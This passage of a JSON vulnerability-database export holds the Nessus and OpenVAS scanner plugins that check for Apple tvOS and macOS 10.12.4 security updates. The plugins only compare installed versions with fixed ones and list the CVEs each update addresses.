(CVE-2017-2379)\n\n - An information disclosure vulnerability exists in WebKit\n when handling unspecified exceptions. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to disclose data\n cross-origin. (CVE-2017-2386)\n\n - A flaw exists in the libarchive component due to the\n insecure creation of temporary files. A local attacker\n can exploit this, by using a symlink attack against an\n unspecified file, to cause unexpected changes to be made\n to file system permissions. (CVE-2017-2390)\n\n - Multiple memory corruption issues exist in WebKit that\n allow an unauthenticated, remote attacker to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2017-2394, CVE-2017-2395,\n CVE-2017-2396, CVE-2017-2454, CVE-2017-2455,\n CVE-2017-2459, CVE-2017-2460, CVE-2017-2464,\n CVE-2017-2465, CVE-2017-2466, CVE-2017-2468,\n CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in the Kernel component\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a denial of service condition or\n the execution or arbitrary code. (CVE-2017-2401)\n\n - Multiple memory corruption issues exist in the FontParser\n component when handling font files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit these to cause a denial condition\n or the execution of arbitrary code. (CVE-2017-2406,\n CVE-2017-2407, CVE-2017-2487)\n\n - An unspecified type confusion error exists in WebKit\n that allows an unauthenticated, remote attacker to\n execute arbitrary code by using specially crafted web\n content. (CVE-2017-2415)\n\n - A memory corruption issue exists in the ImageIO\n component, specifically in the GIFReadPlugin::init()\n function, when handling image files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted image\n file, to cause a denial of service condition or the\n execution of arbitrary code. (CVE-2017-2416)\n\n - An infinite recursion condition exists in the\n CoreGraphics component when handling image files. An\n unauthenticated, remote can exploit this, via a\n specially crafted image file, to cause a denial of\n service condition. (CVE-2017-2417)\n\n - An unspecified flaw exists related to nghttp2 and\n LibreSSL. An unauthenticated, remote attacker can\n exploit this, by convincing a user to access a malicious\n HTTP/2 server, to have an unspecified impact on\n confidentiality, integrity, and availability.\n (CVE-2017-2428)\n\n - A type confusion error exists in the Audio component\n when parsing specially crafted M4A audio files due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2430)\n\n - An integer overflow condition exists in the ImageIO\n component when handling JPEG files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2432)\n\n - A memory corruption issue exists in the CoreText\n component when handling font files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2435)\n\n - An out-of-bounds read error exists in the FontParser\n component when handling font files. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted file, to disclose process memory.\n (CVE-2017-2439)\n\n - An integer overflow condition exists in the Kernel\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to execute arbitrary code with kernel-level\n privileges. (CVE-2017-2440)\n\n - A use-after-free error exists in libc++abi when\n demangling C++ applications. An unauthenticated, remote\n attacker can exploit this, by convincing a user to run a\n specially crafted application, to execute arbitrary\n code. (CVE-2017-2441)\n\n - A memory corruption issue exists in WebKit within the\n CoreGraphics component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frame objects due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to execute arbitrary\n script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions\n that are called from built-in strict mode scripts not\n being properly restricted from calling sensitive native\n functions. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when\n handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted web content, to disclose memory\n contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in the Security component due\n to improper validation of OTR packets under certain\n conditions. A man-in-the-middle attacker can exploit\n this to disclose and optionally manipulate transmitted\n data by spoofing the TLS/SSL server via a packet that\n appears to be valid. (CVE-2017-2448)\n\n - An out-of-bounds read error exists in CoreText component\n when handling font files. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to disclose process memory. (CVE-2017-2450)\n\n - A buffer overflow condition exists in the Security\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this,\n by convincing a user to run a specially crafted\n application, to execute arbitrary code with root\n root privileges. (CVE-2017-2451)\n\n - A race condition exists in the Kernel component when\n handling memory using the 'mach_msg' system call. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a heap-based buffer overflow,\n resulting in a denial of service condition or the\n execution of arbitrary code with root privileges.\n CVE-2017-2456)\n\n - An buffer overflow condition exists in the Keyboards\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2017-2458)\n\n - A denial of service vulnerability exists in the\n CoreText component when handling specially crafted text\n messages due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n exhaust available resources on the system.\n (CVE-2017-2461)\n\n - A heap buffer overflow condition exists in the Audio\n component when parsing specially crafted M4A audio files\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted file, to execute arbitrary code.\n (CVE-2017-2462)\n\n - An memory corruption issue exists in the ImageIO\n component when handling specially crafted files due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2467)\n\n - A use-after-free error exists in the Kernel component in\n the XNU port actions extension due to improper handling\n of port references in error cases. An local attacker can\n exploit this to deference already freed memory,\n resulting in the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2472)\n\n - A signedness error exists in the Kernel component in the\n SIOCSIFORDER IOCTL due to improper validation of certain\n input. A local attacker can exploit this to cause an\n out-of-bounds read and memory corruption, resulting in\n a denial of service condition or the execution of\n arbitrary code with kernel-level privileges.\n (CVE-2017-2473)\n\n - A off-by-one overflow condition exists in the Kernel\n component in the SIOCSIFORDER IOCTL due to improper\n validation of certain input. A local attacker can exploit\n this to cause a heap-based buffer overflow, resulting in\n the execution of arbitrary code with kernel-level\n privileges. (CVE-2017-2474)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frames due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to execute arbitrary script code in a user's\n browser session. (CVE-2017-2475)\n\n - A race condition exists in the Kernel component in the\n necp_open() function when closing files descriptors due\n to improper handling of proc_fd locks. A local attacker\n can exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2478)\n\n - A use-after-free error exists in WebKit when handling\n ElementData objects. An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2481)\n\n - A heap buffer overflow condition exists in the Kernel\n component within the Berkeley Packet Filter (BPF)\n BIOCSBLEN IOCTL due to improper validation of certain\n input when reattaching to an interface. A local attacker\n can exploit this to cause a denial of service condition\n or the execution of arbitrary code with kernel-level\n privileges. (CVE-2017-2482)\n\n - An off-by-one error exists in the Kernel component,\n specifically in the audit_pipe_open() function, when\n handling auditpipe devices due to improper validation of\n certain input. A local attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2483)\n\n - An unspecified memory corruption issue exists in the\n Security component when parsing X.509 certificates due\n to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2485)\n\n - A double-free error exists in the Kernel component due\n to FSEVENTS_DEVICE_FILTER_64 IOCTL not properly locking\n devices. A local attacker can exploit this to corrupt\n memory, resulting in the execution of arbitrary code\n with elevated privileges. (CVE-2017-2490)\n\n - A use-after-free error exists in JavaScriptCore when\n handling the String.replace() method. An\n unauthenticated, remote attacker can exploit this to\n deference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in JavaScriptCore due to an unspecified prototype\n flaw. An unauthenticated, remote attacker can exploit\n this, via a specially crafted web page, to execute\n arbitrary code in a user's browser session.\n (CVE-2017-2492)\n\nNote that only 4th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207601\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00007.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b1dbb626\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 10.2 or later. Note that this update is\nonly available for 4th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2490\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\nfixed_build = \"14W265\";\ntvos_ver = '10.2';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE,\n xss : TRUE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T00:01:18", "bulletinFamily": "scanner", "description": "The remote host is running a version of macOS that is 10.12.x prior to\n10.12.4. It is, therefore, affected by multiple vulnerabilities in\nmultiple components, some of which are remote code execution\nvulnerabilities. An unauthenticated, remote attacker can exploit these\nremote code execution vulnerabilities by convincing a user to visit a\nspecially crafted website, resulting in the execution of arbitrary\ncode in the context of the current user. The affected components are\nas follows :\n\n - apache\n - apache_mod_php\n - AppleGraphicsPowerManagement\n - AppleRAID\n - Audio\n - Bluetooth\n - Carbon\n - CoreGraphics\n - CoreMedia\n - CoreText\n - curl\n - EFI\n - FinderKit\n - FontParser\n - HTTPProtocol\n - Hypervisor\n - iBooks\n - ImageIO\n - Intel Graphics Driver\n - IOATAFamily\n - IOFireWireAVC\n - IOFireWireFamily\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - LibreSSL\n - MCX Client\n - Menus\n - Multi-Touch\n - OpenSSH\n - OpenSSL\n - Printing\n - python\n - QuickTime\n - Security\n - SecurityFoundation\n - sudo\n - System Integrity Protection\n - tcpdump\n - tiffutil\n - WebKit", "modified": "2020-01-02T00:00:00", "id": "MACOS_10_12_4.NASL", "href": "https://www.tenable.com/plugins/nessus/99134", "published": "2017-03-31T00:00:00", "title": "macOS 10.12.x < 10.12.4 Multiple Vulnerabilities (httpoxy)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99134);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-3619\",\n \"CVE-2016-4688\",\n \"CVE-2016-5387\",\n \"CVE-2016-5636\",\n \"CVE-2016-7056\",\n \"CVE-2016-7585\",\n \"CVE-2016-7922\",\n \"CVE-2016-7923\",\n \"CVE-2016-7924\",\n \"CVE-2016-7925\",\n \"CVE-2016-7926\",\n \"CVE-2016-7927\",\n \"CVE-2016-7928\",\n \"CVE-2016-7929\",\n \"CVE-2016-7930\",\n \"CVE-2016-7931\",\n \"CVE-2016-7932\",\n \"CVE-2016-7933\",\n \"CVE-2016-7934\",\n \"CVE-2016-7935\",\n \"CVE-2016-7936\",\n \"CVE-2016-7937\",\n \"CVE-2016-7938\",\n \"CVE-2016-7939\",\n \"CVE-2016-7940\",\n \"CVE-2016-7973\",\n \"CVE-2016-7974\",\n \"CVE-2016-7975\",\n \"CVE-2016-7983\",\n \"CVE-2016-7984\",\n \"CVE-2016-7985\",\n \"CVE-2016-7986\",\n \"CVE-2016-7992\",\n \"CVE-2016-7993\",\n \"CVE-2016-8574\",\n \"CVE-2016-8575\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\",\n \"CVE-2016-9533\",\n \"CVE-2016-9535\",\n \"CVE-2016-9536\",\n \"CVE-2016-9537\",\n \"CVE-2016-9538\",\n \"CVE-2016-9539\",\n \"CVE-2016-9540\",\n \"CVE-2016-9586\",\n \"CVE-2016-9935\",\n \"CVE-2016-10009\",\n \"CVE-2016-10010\",\n \"CVE-2016-10011\",\n \"CVE-2016-10012\",\n \"CVE-2016-10158\",\n \"CVE-2016-10159\",\n \"CVE-2016-10160\",\n \"CVE-2016-10161\",\n \"CVE-2017-2379\",\n \"CVE-2017-2381\",\n \"CVE-2017-2388\",\n \"CVE-2017-2390\",\n \"CVE-2017-2398\",\n \"CVE-2017-2401\",\n \"CVE-2017-2402\",\n \"CVE-2017-2403\",\n \"CVE-2017-2406\",\n \"CVE-2017-2407\",\n \"CVE-2017-2408\",\n \"CVE-2017-2409\",\n \"CVE-2017-2410\",\n \"CVE-2017-2413\",\n \"CVE-2017-2416\",\n \"CVE-2017-2417\",\n \"CVE-2017-2418\",\n \"CVE-2017-2420\",\n \"CVE-2017-2421\",\n \"CVE-2017-2422\",\n \"CVE-2017-2423\",\n \"CVE-2017-2425\",\n \"CVE-2017-2426\",\n \"CVE-2017-2427\",\n \"CVE-2017-2428\",\n \"CVE-2017-2429\",\n \"CVE-2017-2430\",\n \"CVE-2017-2431\",\n \"CVE-2017-2432\",\n \"CVE-2017-2435\",\n \"CVE-2017-2436\",\n \"CVE-2017-2437\",\n \"CVE-2017-2438\",\n \"CVE-2017-2439\",\n \"CVE-2017-2440\",\n \"CVE-2017-2441\",\n \"CVE-2017-2443\",\n \"CVE-2017-2448\",\n \"CVE-2017-2449\",\n \"CVE-2017-2450\",\n \"CVE-2017-2451\",\n \"CVE-2017-2456\",\n \"CVE-2017-2458\",\n \"CVE-2017-2461\",\n \"CVE-2017-2462\",\n \"CVE-2017-2467\",\n \"CVE-2017-2472\",\n \"CVE-2017-2473\",\n \"CVE-2017-2474\",\n \"CVE-2017-2477\",\n \"CVE-2017-2478\",\n \"CVE-2017-2482\",\n \"CVE-2017-2483\",\n \"CVE-2017-2485\",\n \"CVE-2017-2487\",\n \"CVE-2017-2489\",\n \"CVE-2017-2490\",\n \"CVE-2017-5029\",\n \"CVE-2017-5202\",\n \"CVE-2017-5203\",\n \"CVE-2017-5204\",\n \"CVE-2017-5205\",\n \"CVE-2017-5341\",\n \"CVE-2017-5342\",\n \"CVE-2017-5482\",\n \"CVE-2017-5483\",\n \"CVE-2017-5484\",\n \"CVE-2017-5485\",\n \"CVE-2017-5486\",\n \"CVE-2017-6974\",\n \"CVE-2017-7070\"\n );\n script_bugtraq_id(\n 85919,\n 91247,\n 91816,\n 94572,\n 94650,\n 94742,\n 94744,\n 94745,\n 94746,\n 94747,\n 94753,\n 94754,\n 94846,\n 94968,\n 94972,\n 94975,\n 94977,\n 95019,\n 95076,\n 95077,\n 95078,\n 95375,\n 95764,\n 95768,\n 95774,\n 95783,\n 95852,\n 96767,\n 97132,\n 97134,\n 97137,\n 97140,\n 97146,\n 97147,\n 97300,\n 97301,\n 97303\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-3\");\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n script_xref(name:\"EDB-ID\", value:\"40962\");\n\n script_name(english:\"macOS 10.12.x < 10.12.4 Multiple Vulnerabilities (httpoxy)\");\n script_summary(english:\"Checks the version of macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS that is 10.12.x prior to\n10.12.4. It is, therefore, affected by multiple vulnerabilities in\nmultiple components, some of which are remote code execution\nvulnerabilities. An unauthenticated, remote attacker can exploit these\nremote code execution vulnerabilities by convincing a user to visit a\nspecially crafted website, resulting in the execution of arbitrary\ncode in the context of the current user. The affected components are\nas follows :\n\n - apache\n - apache_mod_php\n - AppleGraphicsPowerManagement\n - AppleRAID\n - Audio\n - Bluetooth\n - Carbon\n - CoreGraphics\n - CoreMedia\n - CoreText\n - curl\n - EFI\n - FinderKit\n - FontParser\n - HTTPProtocol\n - Hypervisor\n - iBooks\n - ImageIO\n - Intel Graphics Driver\n - IOATAFamily\n - IOFireWireAVC\n - IOFireWireFamily\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - LibreSSL\n - MCX Client\n - Menus\n - Multi-Touch\n - OpenSSH\n - OpenSSL\n - Printing\n - python\n - QuickTime\n - Security\n - SecurityFoundation\n - sudo\n - System Integrity Protection\n - tcpdump\n - tiffutil\n - WebKit\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207615\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddb4db4a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpoxy.org\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.12.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5636\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nif (version !~ \"^10\\.12($|[^0-9])\") audit(AUDIT_OS_NOT, \"Mac OS 10.12.x\");\n\nfixed_version = \"10.12.4\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n xss:TRUE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-09-24T15:05:29", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-09-20T00:00:00", "published": "2017-03-31T00:00:00", "id": "OPENVAS:1361412562310810728", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810728", "title": "Apple Mac OS X Multiple Vulnerabilities-HT207615", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-HT207615\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810728\");\n script_version(\"2019-09-20T11:01:01+0000\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-5387\", \"CVE-2016-8740\",\n \"CVE-2016-8743\", \"CVE-2016-10158\", \"CVE-2016-10159\", \"CVE-2016-10160\",\n \"CVE-2016-10161\", \"CVE-2016-9935\", \"CVE-2017-2421\", \"CVE-2017-2438\",\n \"CVE-2017-2430\", \"CVE-2017-2462\", \"CVE-2017-2420\", \"CVE-2017-2427\",\n \"CVE-2017-2449\", \"CVE-2017-2379\", \"CVE-2017-2417\", \"CVE-2017-2431\",\n \"CVE-2017-2435\", \"CVE-2017-2450\", \"CVE-2017-2461\", \"CVE-2016-9586\",\n \"CVE-2016-7585\", \"CVE-2017-2429\", \"CVE-2017-2487\", \"CVE-2017-2406\",\n \"CVE-2017-2407\", \"CVE-2017-2439\", \"CVE-2017-2428\", \"CVE-2017-2418\",\n \"CVE-2017-2426\", \"CVE-2017-2416\", \"CVE-2017-2467\", \"CVE-2017-2489\",\n \"CVE-2016-3619\", \"CVE-2017-2443\", \"CVE-2017-2408\", \"CVE-2017-2436\",\n \"CVE-2017-2437\", \"CVE-2017-2388\", \"CVE-2017-2398\", \"CVE-2017-2401\",\n \"CVE-2017-2410\", \"CVE-2017-2440\", \"CVE-2017-2456\", \"CVE-2017-2472\",\n \"CVE-2017-2473\", \"CVE-2017-2474\", \"CVE-2017-2478\", \"CVE-2017-2482\",\n \"CVE-2017-2483\", \"CVE-2017-2458\", \"CVE-2017-2448\", \"CVE-2017-2390\",\n \"CVE-2017-2441\", \"CVE-2017-2402\", \"CVE-2017-2392\", \"CVE-2017-2457\",\n \"CVE-2017-2409\", \"CVE-2017-2422\", \"CVE-2016-10009\", \"CVE-2016-10010\",\n \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-7056\", \"CVE-2017-2403\",\n \"CVE-2016-5636\", \"CVE-2017-2413\", \"CVE-2017-2423\", \"CVE-2017-2451\",\n \"CVE-2017-2485\", \"CVE-2017-2425\", \"CVE-2017-2381\", \"CVE-2017-6974\",\n \"CVE-2016-7922\", \"CVE-2016-7923\", \"CVE-2016-7924\", \"CVE-2016-7925\",\n \"CVE-2016-7926\", \"CVE-2016-7927\", \"CVE-2016-7928\", \"CVE-2016-7929\",\n \"CVE-2016-7930\", \"CVE-2016-7931\", \"CVE-2016-7932\", \"CVE-2016-7933\",\n \"CVE-2016-7934\", \"CVE-2016-7935\", \"CVE-2016-7936\", \"CVE-2016-7937\",\n \"CVE-2016-7938\", \"CVE-2016-7939\", \"CVE-2016-7940\", \"CVE-2016-7973\",\n \"CVE-2016-7974\", \"CVE-2016-7975\", \"CVE-2016-7983\", \"CVE-2016-7984\",\n \"CVE-2016-7985\", \"CVE-2016-7986\", \"CVE-2016-7992\", \"CVE-2016-7993\",\n \"CVE-2016-8574\", \"CVE-2016-8575\", \"CVE-2017-5202\", \"CVE-2017-5203\",\n \"CVE-2017-5204\", \"CVE-2017-5205\", \"CVE-2017-5341\", \"CVE-2017-5342\",\n \"CVE-2017-5482\", \"CVE-2017-5483\", \"CVE-2017-5484\", \"CVE-2017-5485\",\n \"CVE-2017-5486\", \"CVE-2016-9533\", \"CVE-2016-9535\",\n \"CVE-2016-9536\", \"CVE-2016-9537\", \"CVE-2016-9538\", \"CVE-2016-9539\",\n \"CVE-2016-9540\", \"CVE-2017-2486\", \"CVE-2016-4688\", \"CVE-2017-2432\",\n \"CVE-2017-2490\", \"CVE-2017-7070\", \"CVE-2017-2477\", \"CVE-2017-5029\");\n script_bugtraq_id(95078, 95076, 91816, 94650, 95077, 95764, 95774, 95783, 95768,\n 94846, 97140, 97137, 95019, 97146, 85919, 97147, 97134, 95375,\n 96767, 94968, 94972, 94977, 94975, 91247, 97132, 95852, 94742,\n 94744, 94745, 94746, 94753, 94754, 94747, 97300, 97303);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-20 11:01:01 +0000 (Fri, 20 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 17:37:14 +0530 (Fri, 31 Mar 2017)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-HT207615\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details\n refer the reference links.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code or cause a denial of service (memory corruption),\n gain access to potentially sensitive information, bypass certain protection\n mechanism and have other impacts.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x through\n 10.12.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.12.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207615\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.12\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\nif(\"Mac OS X\" >< osName)\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.3\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.12.4\");\n security_message(data:report);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
